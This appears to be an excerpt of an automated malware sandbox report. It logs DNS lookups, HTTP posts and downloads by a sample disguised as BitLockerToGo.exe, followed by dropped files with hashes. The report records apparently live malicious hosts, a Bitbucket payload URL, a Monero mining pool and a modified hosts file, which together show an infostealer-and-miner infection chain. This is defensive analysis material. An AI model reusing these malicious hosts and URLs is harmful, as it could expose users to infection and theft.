          172.214.232.199.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          172.214.232.199.in-addr.arpa
          IN PTR
          Response
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 499
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:23:01 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJK
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 499
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:23:10 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HIJJEGDBFIIDGCAKJEBK
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:23:10 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-us
          DNS
          cowod.hopto.org
          BitLockerToGo.exe
          Remote address:
          8.8.8.8:53
          Request
          cowod.hopto.org
          IN A
          Response
          cowod.hopto.org
          IN A
          45.132.206.251
        • flag-ru
          POST
          http://cowod.hopto.org/
          BitLockerToGo.exe
          Remote address:
          45.132.206.251:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEH
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: cowod.hopto.org
          Content-Length: 2745
          Connection: Keep-Alive
          Cache-Control: no-cache
        • flag-us
          DNS
          251.206.132.45.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          251.206.132.45.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          xmr-eu1.nanopool.org
          explorer.exe
          Remote address:
          8.8.8.8:53
          Request
          xmr-eu1.nanopool.org
          IN A
          Response
          xmr-eu1.nanopool.org
          IN A
          51.15.65.182
          xmr-eu1.nanopool.org
          IN A
          146.59.154.106
          xmr-eu1.nanopool.org
          IN A
          54.37.137.114
          xmr-eu1.nanopool.org
          IN A
          51.15.193.130
          xmr-eu1.nanopool.org
          IN A
          51.89.23.91
          xmr-eu1.nanopool.org
          IN A
          163.172.154.142
          xmr-eu1.nanopool.org
          IN A
          212.47.253.124
          xmr-eu1.nanopool.org
          IN A
          162.19.224.121
          xmr-eu1.nanopool.org
          IN A
          141.94.23.83
          xmr-eu1.nanopool.org
          IN A
          51.15.58.224
          xmr-eu1.nanopool.org
          IN A
          54.37.232.103
        • flag-us
          DNS
          pastebin.com
          explorer.exe
          Remote address:
          8.8.8.8:53
          Request
          pastebin.com
          IN A
          Response
          pastebin.com
          IN A
          172.67.19.24
          pastebin.com
          IN A
          104.20.3.235
          pastebin.com
          IN A
          104.20.4.235
        • flag-us
          DNS
          142.154.172.163.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          142.154.172.163.in-addr.arpa
          IN PTR
          Response
          142.154.172.163.in-addr.arpa
          IN PTR
          142-154-172-163 instancesscwcloud
        • flag-us
          DNS
          24.19.67.172.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          24.19.67.172.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          xmr-eu1.nanopool.org
          explorer.exe
          Remote address:
          8.8.8.8:53
          Request
          xmr-eu1.nanopool.org
          IN A
          Response
          xmr-eu1.nanopool.org
          IN A
          163.172.154.142
          xmr-eu1.nanopool.org
          IN A
          54.37.232.103
          xmr-eu1.nanopool.org
          IN A
          162.19.224.121
          xmr-eu1.nanopool.org
          IN A
          141.94.23.83
          xmr-eu1.nanopool.org
          IN A
          146.59.154.106
          xmr-eu1.nanopool.org
          IN A
          54.37.137.114
          xmr-eu1.nanopool.org
          IN A
          51.15.193.130
          xmr-eu1.nanopool.org
          IN A
          51.15.65.182
          xmr-eu1.nanopool.org
          IN A
          51.15.58.224
          xmr-eu1.nanopool.org
          IN A
          51.89.23.91
          xmr-eu1.nanopool.org
          IN A
          212.47.253.124
        • flag-us
          DNS
          pastebin.com
          explorer.exe
          Remote address:
          8.8.8.8:53
          Request
          pastebin.com
          IN A
          Response
          pastebin.com
          IN A
          104.20.3.235
          pastebin.com
          IN A
          172.67.19.24
          pastebin.com
          IN A
          104.20.4.235
        • flag-us
          DNS
          130.193.15.51.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          130.193.15.51.in-addr.arpa
          IN PTR
          Response
          130.193.15.51.in-addr.arpa
          IN PTR
          130-193-15-51 instancesscwcloud
        • flag-us
          DNS
          235.3.20.104.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          235.3.20.104.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          91.23.89.51.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          91.23.89.51.in-addr.arpa
          IN PTR
          Response
          91.23.89.51.in-addr.arpa
          IN PTR
          vps-2ced4041vpsovhnet
        • flag-us
          DNS
          43.229.111.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          43.229.111.52.in-addr.arpa
          IN PTR
          Response
        • 104.82.234.109:443
          https://steamcommunity.com/profiles/76561199780418869
          tls, http
          BitLockerToGo.exe
          2.2kB
          42.5kB
          38
          36

          HTTP Request

          GET https://steamcommunity.com/profiles/76561199780418869

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          958 B
          2.7kB
          11
          8

          HTTP Request

          GET https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.4kB
          622 B
          9
          6

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.5kB
          2.2kB
          10
          7

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.6kB
          6.4kB
          13
          10

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.4kB
          672 B
          9
          6

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          6.0kB
          605 B
          13
          7

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/sqlp.dll
          tls, http
          BitLockerToGo.exe
          91.1kB
          2.5MB
          1836
          1825

          HTTP Request

          GET https://49.12.197.9/sqlp.dll

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.5kB
          565 B
          9
          6

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.5kB
          565 B
          9
          6

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/freebl3.dll
          tls, http
          BitLockerToGo.exe
          24.4kB
          707.6kB
          518
          515

          HTTP Request

          GET https://49.12.197.9/freebl3.dll

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/mozglue.dll
          tls, http
          BitLockerToGo.exe
          21.7kB
          627.8kB
          459
          456

          HTTP Request

          GET https://49.12.197.9/mozglue.dll

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/msvcp140.dll
          tls, http
          BitLockerToGo.exe
          16.3kB
          464.7kB
          341
          338

          HTTP Request

          GET https://49.12.197.9/msvcp140.dll

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/softokn3.dll
          tls, http
          BitLockerToGo.exe
          9.8kB
          266.6kB
          199
          196

          HTTP Request

          GET https://49.12.197.9/softokn3.dll

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/vcruntime140.dll
          tls, http
          BitLockerToGo.exe
          3.7kB
          84.0kB
          68
          65

          HTTP Request

          GET https://49.12.197.9/vcruntime140.dll

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/nss3.dll
          tls, http
          BitLockerToGo.exe
          71.3kB
          2.1MB
          1536
          1523

          HTTP Request

          GET https://49.12.197.9/nss3.dll

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          2.2kB
          565 B
          10
          6

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.5kB
          2.8kB
          10
          7

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.5kB
          2.2kB
          10
          7

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.6kB
          565 B
          9
          6

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.4kB
          768 B
          9
          6

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 185.166.142.23:443
          https://bitbucket.org/hgtbvfd11/123aqd/downloads/Updater.exe
          tls, http
          BitLockerToGo.exe
          1.6kB
          14.3kB
          19
          16

          HTTP Request

          GET https://bitbucket.org/hgtbvfd11/123aqd/downloads/NewApp.exe

          HTTP Response

          302

          HTTP Request

          GET https://bitbucket.org/hgtbvfd11/123aqd/downloads/Updater.exe

          HTTP Response

          302
        • 3.5.16.13:443
          https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/229e1024-5f7f-478d-87e8-7147253740ca/Updater.exe?response-content-disposition=attachment%3B%20filename%3D%22Updater.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGZQJJ3LT&Signature=nZUikPkEYNyH%2BN7Of20X24D4RWc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICPY6T%2FxbdvaUM6%2FHMyAfa1No%2B3nhNgdiAdegOTeig5iAiEA0rt%2FOYiAqqaV13gbcKAu9tR4jG6JeTBUCFR%2B%2Blc8nDcqsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDBEQmbyN6goaJEb7piqEAikvE2kgTu1BlGdTB2Jd%2F1pwDiGFYBo9RjFI1VdiepzQwgzg65z6YcU2PPsmTeUsh9uJyNt1%2BbpL6BfBgRKmAqz6gZV7xG85H%2FTWe1jCwjYsqTcwdLk3UKxTShPQKl%2B4Srg7gs2VrWM%2Bhgf49SYSiNpdzpUJgA5j2ApwYTDCnfPZw1k6jOXdbWrmWBpKKIhoPr8r37XdUeA59X1x01S2oFq2seIzf0wo1SrgQYsA3f9ZPzgne0ILrzeUB6r0dsgXVTE57uAXEOTt5rnt%2F2SESTFGbWdJC3b0CNecPfqsbEDtYMB6q0%2B0WkeaLKXP%2BNwY0TF4USWY2jcvRFZ99AHmpJTtSXCmMOfug7gGOp0B1SA0VjWXp94AbNAVTqjYnmGsaxXDd8KFVTqLt6D3vy2EUeMN7gZdO%2Bd1HsxFiaZ%2B0hm3Xav9zVYNQ15%2Fny2qB5qlJ%2BFNNk1huLZkCmI3faq9SUMCpOELBt38Nh4tgizwqDzDJEFBCBtsTa8%2F%2BeZVK8QBZU0M4basZJkF%2FI%2BaKFdQltAASWCbW52A7eXufbJ8LBmXdKUOWs38nCpu6Q%3D%3D&Expires=1728118383
          tls, http
          BitLockerToGo.exe
          420.2kB
          12.0MB
          8946
          8942

          HTTP Request

          GET https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/efc3f4df-566a-4e3d-a8c3-cd4708b4599f/NewApp.exe?response-content-disposition=attachment%3B%20filename%3D%22NewApp.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIOEDZEQY&Signature=Kjq5tG1cimjEQTj0wkOA2GOCLPQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQCnXgyFltKi3dQpydsVQvAwlMztTPllbRgX4mMAeuidXwIgF3B23dFoYwbLjjC39KAJpIfH2Bj5a14COsVsnfjcQp4qsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDEc4xoYs92b5j8nidiqEAswimLEg3%2BZ4O6g8egwzuANPjyidZc7ieOaDWbpGfQCnRP2ws3gvQqxQcqLA084F9TTH3KDgAes9iq9PRXVlp8BAwEwtylETuGENBhLvf9n6%2FRuEaOoRdNNV%2BO4Uh%2BnuRekm4CHIUFL4Mk%2BGTihNv73LT%2F%2BlxkwVgvQQRZDs2XRpxF9axVntPBLFwwfUeJWhYIcTqDIIt2NKvzY%2BmqvdFoJ6Oj%2F6Xz75gc4RDy2G3ZJ3ZeLzobFvLNge9aaSTJfXCYDXDinSkz0W6mgrMgmpr0Gq7K7SXwkNjY7Q1fHkN4TC96FhCtUyLbUAeAz365NyoXrPT9ul2qPupYhI0PZG%2Fix7pCkaMN7ug7gGOp0B8zlzvjZ%2F7zIduo96c0nV%2FQRieWQsdSehGHLrbpI1Lq0wQ7Nu087qZQjtEomi%2Fy3TO3z9CmMUq4c77tK5QTrFqOVd%2F%2BVqmyADdz%2B0qhS0FwaWXJspJLBV3EkUjgAgc5vyIEFLZsH2KAd3j5Q29LuuIftaTgaeCC9qHuzGhQDjtEcajazoBgzYZdwuS7engKURLtjhK3e%2BLHLo3YWIpQ%3D%3D&Expires=1728118374

          HTTP Response

          200

          HTTP Request

          GET https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/229e1024-5f7f-478d-87e8-7147253740ca/Updater.exe?response-content-disposition=attachment%3B%20filename%3D%22Updater.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGZQJJ3LT&Signature=nZUikPkEYNyH%2BN7Of20X24D4RWc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICPY6T%2FxbdvaUM6%2FHMyAfa1No%2B3nhNgdiAdegOTeig5iAiEA0rt%2FOYiAqqaV13gbcKAu9tR4jG6JeTBUCFR%2B%2Blc8nDcqsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDBEQmbyN6goaJEb7piqEAikvE2kgTu1BlGdTB2Jd%2F1pwDiGFYBo9RjFI1VdiepzQwgzg65z6YcU2PPsmTeUsh9uJyNt1%2BbpL6BfBgRKmAqz6gZV7xG85H%2FTWe1jCwjYsqTcwdLk3UKxTShPQKl%2B4Srg7gs2VrWM%2Bhgf49SYSiNpdzpUJgA5j2ApwYTDCnfPZw1k6jOXdbWrmWBpKKIhoPr8r37XdUeA59X1x01S2oFq2seIzf0wo1SrgQYsA3f9ZPzgne0ILrzeUB6r0dsgXVTE57uAXEOTt5rnt%2F2SESTFGbWdJC3b0CNecPfqsbEDtYMB6q0%2B0WkeaLKXP%2BNwY0TF4USWY2jcvRFZ99AHmpJTtSXCmMOfug7gGOp0B1SA0VjWXp94AbNAVTqjYnmGsaxXDd8KFVTqLt6D3vy2EUeMN7gZdO%2Bd1HsxFiaZ%2B0hm3Xav9zVYNQ15%2Fny2qB5qlJ%2BFNNk1huLZkCmI3faq9SUMCpOELBt38Nh4tgizwqDzDJEFBCBtsTa8%2F%2BeZVK8QBZU0M4basZJkF%2FI%2BaKFdQltAASWCbW52A7eXufbJ8LBmXdKUOWs38nCpu6Q%3D%3D&Expires=1728118383

          HTTP Response

          200
        • 18.238.246.206:80
          http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAO9ExOMvLBqk2jkjdZnyjA%3D
          http
          BitLockerToGo.exe
          473 B
          1.1kB
          5
          4

          HTTP Request

          GET http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAO9ExOMvLBqk2jkjdZnyjA%3D

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.6kB
          565 B
          9
          6

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.6kB
          525 B
          8
          5

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 49.12.197.9:443
          https://49.12.197.9/
          tls, http
          BitLockerToGo.exe
          1.4kB
          518 B
          8
          5

          HTTP Request

          POST https://49.12.197.9/

          HTTP Response

          200
        • 45.132.206.251:80
          http://cowod.hopto.org/
          http
          BitLockerToGo.exe
          3.3kB
          132 B
          7
          3

          HTTP Request

          POST http://cowod.hopto.org/
        • 163.172.154.142:10343
          xmr-eu1.nanopool.org
          tls
          explorer.exe
          1.4kB
          2.9kB
          8
          6
        • 172.67.19.24:443
          pastebin.com
          tls
          explorer.exe
          886 B
          3.1kB
          8
          7
        • 51.15.193.130:10343
          xmr-eu1.nanopool.org
          tls
          explorer.exe
          1.4kB
          3.3kB
          9
          8
        • 104.20.3.235:443
          pastebin.com
          tls
          explorer.exe
          996 B
          4.6kB
          10
          10
        • 51.89.23.91:10343
          xmr-eu1.nanopool.org
          tls
          explorer.exe
          1.7kB
          6.5kB
          16
          15
        • 8.8.8.8:53
          209.205.72.20.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          209.205.72.20.in-addr.arpa

        • 8.8.8.8:53
          88.210.23.2.in-addr.arpa
          dns
          70 B
          133 B
          1
          1

          DNS Request

          88.210.23.2.in-addr.arpa

        • 8.8.8.8:53
          133.32.126.40.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          133.32.126.40.in-addr.arpa

        • 8.8.8.8:53
          95.221.229.192.in-addr.arpa
          dns
          73 B
          144 B
          1
          1

          DNS Request

          95.221.229.192.in-addr.arpa

        • 8.8.8.8:53
          228.249.119.40.in-addr.arpa
          dns
          73 B
          159 B
          1
          1

          DNS Request

          228.249.119.40.in-addr.arpa

        • 8.8.8.8:53
          steamcommunity.com
          dns
          BitLockerToGo.exe
          64 B
          80 B
          1
          1

          DNS Request

          steamcommunity.com

          DNS Response

          104.82.234.109

        • 8.8.8.8:53
          109.234.82.104.in-addr.arpa
          dns
          73 B
          139 B
          1
          1

          DNS Request

          109.234.82.104.in-addr.arpa

        • 8.8.8.8:53
          9.197.12.49.in-addr.arpa
          dns
          70 B
          125 B
          1
          1

          DNS Request

          9.197.12.49.in-addr.arpa

        • 8.8.8.8:53
          bitbucket.org
          dns
          BitLockerToGo.exe
          59 B
          107 B
          1
          1

          DNS Request

          bitbucket.org

          DNS Response

          185.166.142.23
          185.166.142.21
          185.166.142.22

        • 8.8.8.8:53
          23.142.166.185.in-addr.arpa
          dns
          73 B
          133 B
          1
          1

          DNS Request

          23.142.166.185.in-addr.arpa

        • 8.8.8.8:53
          bbuseruploads.s3.amazonaws.com
          dns
          BitLockerToGo.exe
          76 B
          254 B
          1
          1

          DNS Request

          bbuseruploads.s3.amazonaws.com

          DNS Response

          3.5.16.13
          16.182.71.105
          54.231.228.41
          52.216.37.97
          16.182.38.177
          3.5.28.154
          54.231.197.129
          52.216.51.145

        • 8.8.8.8:53
          ocsp.r2m01.amazontrust.com
          dns
          BitLockerToGo.exe
          72 B
          88 B
          1
          1

          DNS Request

          ocsp.r2m01.amazontrust.com

          DNS Response

          18.238.246.206

        • 8.8.8.8:53
          197.87.175.4.in-addr.arpa
          dns
          71 B
          157 B
          1
          1

          DNS Request

          197.87.175.4.in-addr.arpa

        • 8.8.8.8:53
          15.164.165.52.in-addr.arpa
          dns
          72 B
          146 B
          1
          1

          DNS Request

          15.164.165.52.in-addr.arpa

        • 8.8.8.8:53
          13.16.5.3.in-addr.arpa
          dns
          68 B
          110 B
          1
          1

          DNS Request

          13.16.5.3.in-addr.arpa

        • 8.8.8.8:53
          174.15.239.18.in-addr.arpa
          dns
          72 B
          129 B
          1
          1

          DNS Request

          174.15.239.18.in-addr.arpa

        • 8.8.8.8:53
          80.41.65.18.in-addr.arpa
          dns
          70 B
          124 B
          1
          1

          DNS Request

          80.41.65.18.in-addr.arpa

        • 8.8.8.8:53
          206.246.238.18.in-addr.arpa
          dns
          73 B
          131 B
          1
          1

          DNS Request

          206.246.238.18.in-addr.arpa

        • 8.8.8.8:53
          172.214.232.199.in-addr.arpa
          dns
          74 B
          128 B
          1
          1

          DNS Request

          172.214.232.199.in-addr.arpa

        • 8.8.8.8:53
          cowod.hopto.org
          dns
          BitLockerToGo.exe
          61 B
          77 B
          1
          1

          DNS Request

          cowod.hopto.org

          DNS Response

          45.132.206.251

        • 8.8.8.8:53
          251.206.132.45.in-addr.arpa
          dns
          73 B
          134 B
          1
          1

          DNS Request

          251.206.132.45.in-addr.arpa

        • 8.8.8.8:53
          xmr-eu1.nanopool.org
          dns
          explorer.exe
          66 B
          242 B
          1
          1

          DNS Request

          xmr-eu1.nanopool.org

          DNS Response

          51.15.65.182
          146.59.154.106
          54.37.137.114
          51.15.193.130
          51.89.23.91
          163.172.154.142
          212.47.253.124
          162.19.224.121
          141.94.23.83
          51.15.58.224
          54.37.232.103

        • 8.8.8.8:53
          pastebin.com
          dns
          explorer.exe
          58 B
          106 B
          1
          1

          DNS Request

          pastebin.com

          DNS Response

          172.67.19.24
          104.20.3.235
          104.20.4.235

        • 8.8.8.8:53
          142.154.172.163.in-addr.arpa
          dns
          74 B
          123 B
          1
          1

          DNS Request

          142.154.172.163.in-addr.arpa

        • 8.8.8.8:53
          24.19.67.172.in-addr.arpa
          dns
          71 B
          133 B
          1
          1

          DNS Request

          24.19.67.172.in-addr.arpa

        • 8.8.8.8:53
          xmr-eu1.nanopool.org
          dns
          explorer.exe
          66 B
          242 B
          1
          1

          DNS Request

          xmr-eu1.nanopool.org

          DNS Response

          163.172.154.142
          54.37.232.103
          162.19.224.121
          141.94.23.83
          146.59.154.106
          54.37.137.114
          51.15.193.130
          51.15.65.182
          51.15.58.224
          51.89.23.91
          212.47.253.124

        • 8.8.8.8:53
          pastebin.com
          dns
          explorer.exe
          58 B
          106 B
          1
          1

          DNS Request

          pastebin.com

          DNS Response

          104.20.3.235
          172.67.19.24
          104.20.4.235

        • 8.8.8.8:53
          130.193.15.51.in-addr.arpa
          dns
          72 B
          119 B
          1
          1

          DNS Request

          130.193.15.51.in-addr.arpa

        • 8.8.8.8:53
          235.3.20.104.in-addr.arpa
          dns
          71 B
          133 B
          1
          1

          DNS Request

          235.3.20.104.in-addr.arpa

        • 8.8.8.8:53
          91.23.89.51.in-addr.arpa
          dns
          70 B
          108 B
          1
          1

          DNS Request

          91.23.89.51.in-addr.arpa

        • 8.8.8.8:53
          43.229.111.52.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          43.229.111.52.in-addr.arpa

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\CGCFBFBGHD.exe

          Filesize

          5.4MB

          MD5

          925ec45b5ac88ab7af039190589204b9

          SHA1

          c71158e158d9b593be3187340c731cab5f14ad98

          SHA256

          419901e7e1747a9c413e657920429ce1d31e1b5af24e68a7dd79629066118133

          SHA512

          089ade1924ffc617670cac36e90d2c302d5b1d9e9edb1501fb0ba2c82ef530dae019b037923cdc45482998fec83fc0c5256f1fc55f22ad4b386721432cd96890

        • C:\ProgramData\HCFCAAEBGC.exe

          Filesize

          5.6MB

          MD5

          2eea3ddbfc81544b54a4ac5028a30805

          SHA1

          b57ad8495421c6bc56498d494a99b4e0cbfabdea

          SHA256

          ab043bb5ec1911f462c0e6341efb93c2760f097becc0c01ecbd02e5949b10025

          SHA512

          0b87ff6eb029675c2b6a9af0136270cb0cfcced04f53756dd35983962b46dbd79cc6ffc679ea3f84b5c6b6f25df07af886ddb3c8a770dfa31fd5b5a522cf9f79

        • C:\ProgramData\mozglue.dll

          Filesize

          593KB

          MD5

          c8fd9be83bc728cc04beffafc2907fe9

          SHA1

          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

          SHA256

          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

          SHA512

          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

        • C:\ProgramData\nss3.dll

          Filesize

          2.0MB

          MD5

          1cc453cdf74f31e4d913ff9c10acdde2

          SHA1

          6e85eae544d6e965f15fa5c39700fa7202f3aafe

          SHA256

          ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

          SHA512

          dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gb3a33gr.o31.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Windows\TEMP\pjjtwoljkwri.sys

          Filesize

          14KB

          MD5

          0c0195c48b6b8582fa6f6373032118da

          SHA1

          d25340ae8e92a6d29f599fef426a2bc1b5217299

          SHA256

          11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

          SHA512

          ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          4KB

          MD5

          bdb25c22d14ec917e30faf353826c5de

          SHA1

          6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

          SHA256

          e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

          SHA512

          b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          b42c70c1dbf0d1d477ec86902db9e986

          SHA1

          1d1c0a670748b3d10bee8272e5d67a4fabefd31f

          SHA256

          8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

          SHA512

          57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          2b24135c275cd88473601b97234e4c4d

          SHA1

          5aac75438f222f430ab9b95f80f22a5626c498fa

          SHA256

          f66b5a12ca819afeb838fe912093d4c3cab6287fddad1ae516052a83a35b8983

          SHA512

          274f62312c4734c8ea7ec02411a3f0e179871b76660f487a3b0a7b9934675e414ca5bc7f3bf89d133aca52b947e8e309cdc3c5fa066e47516ce55414e498ffbd

        • C:\Windows\system32\drivers\etc\hosts

          Filesize

          3KB

          MD5

          00930b40cba79465b7a38ed0449d1449

          SHA1

          4b25a89ee28b20ba162f23772ddaf017669092a5

          SHA256

